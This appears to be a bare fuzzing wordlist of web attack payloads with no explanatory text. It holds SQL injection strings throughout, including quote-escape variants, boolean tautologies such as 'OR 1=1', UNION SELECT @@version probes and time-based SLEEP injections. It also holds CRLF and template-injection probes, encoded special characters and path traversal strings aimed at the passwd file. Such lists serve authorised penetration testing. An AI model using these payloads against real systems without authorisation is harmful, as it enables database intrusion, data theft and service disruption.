%20
+
true
false
null
TRUE
FALSE
NULL
\r\n
\r
\n
\r\naaaa
\raaaa
\naaaa
%0D%0A
%0D
%0A
%0D%0Aaaaa
%0Daaaa
%0Aaaaa
!
"
#
%
&
'
(
)
*
+
,
-
.
/
:
;
<
=
>
?
@
[
\
]
^
_
`
{
|
}
~
$
]]>>
]]
>>
[]
%21
%22
%23
%24
%25
%26
%27
%28
%29
%2A
%2B
%2C
%2F
%3A
%3B
%3C
%3D
%3E
%3F
%40
%5B
%5C
%5D
%5E
%60
%7B
%7C
%7D
1
0
1.5
%00
%27
%27'
%22
%23
%3B
%29
%2A
%%2727
%25%27
%25%00
%2500
'
''
"
'+'
'%20'
'||'
'--
''--+-
'--%20--
'--%20--#
''#
'||'#
'+'#
'%20'#
"
""
"+"
"%20"
"||"
"--
"--+-
""--+-
"--%20--
"#
"||"#
"+"#
"%20"#
"--%20--
"--%20--#
%27--
%27'--
`
')
")
`)
'))
"))
`))
\
\0
\\0
\\
\'
\\'
\\\'
\0'
\\0'
%00'
\"
\\"
\\\"
\0"
\\0"
%00"
'/**/--
+'+'
+''
+''
+'||'
'+--+-
+--+-
${{<%[%'"}}%\.
{{$env}}
={{$env}}
${1/0}
%%2727
%25%27
U+02BA
U+02B9
%CA%BA
%CA%B9
'|| 1=1
'|| 1=1#
'|| 1=1--
"|| 1=1#
"|| 1=1--
' or '1'='1'#
\\' OR 1=1
\\' or '1'='1'#
'+AND+TRUE--
'+AND+FALSE-- 
AND+1=1
AND+1=2
'AND+1='1
'AND+1='2
'+AND+1='1
'+AND+1='2
"+AND+1='1
"+AND+1='2
"AND+1='1
"AND+1='2
+AND+1=1+--+-
'+AND+1&1=1-- 
'+AND+1&1=2--
'+AND+TRUE#
'+AND+FALSE#
AND+1=1#
AND+1=2#
'AND+1='1#
'AND+1='2#
'+AND+1='1#
'+AND+1='2#
"+AND+1='1#
"+AND+1='2#
"AND+1='1#
"AND+1='2#
+AND+1=1+#
'+AND+1&1=1# 
'+AND+1&1=2#
\' OR '1'='1
\\' OR '1'='1
%u' OR 1=1 --
%s' OR 1=1 --
\$1' OR 1=1 --
\0' OR 1=1 --
\\' OR 1=1 --
\\\' OR 1=1 --
\\\\' OR 1=1 --
\\\\\' OR 1=1 --
\\' OR \\'1\\'=\\'1
\$1' UNION SELECT NULL,NULL --
\0' UNION SELECT @@version --
%u' AND SLEEP(5) --
\\'%u' OR '1'='1
\' or '1'='1'#
\\' or '1'='1'#
%u' or '1'='1'#
%s' or '1'='1'#
\$1' or '1'='1'#
\0' or '1'='1'#
\\' or '1'='1'#
\\\' or '1'='1'#
\\\\' or '1'='1'#
\\\\\' or '1'='1'#
\\' OR \\'1\\'=\\'1#
\\'%u' or '1'='1'#
\$1' UNION SELECT NULL,NULL --
\0' UNION SELECT @@version --
%u'||sleep(15)#
\0'||sleep(15)#
\\'||sleep(15)#
\\\'||sleep(15)#
\\\\'||sleep(15)#
\\\\\'||sleep(15)#
\\'%u'||sleep(15)#
../../
../../../../../passwd/etc
../../../../../../../../passwd/etc
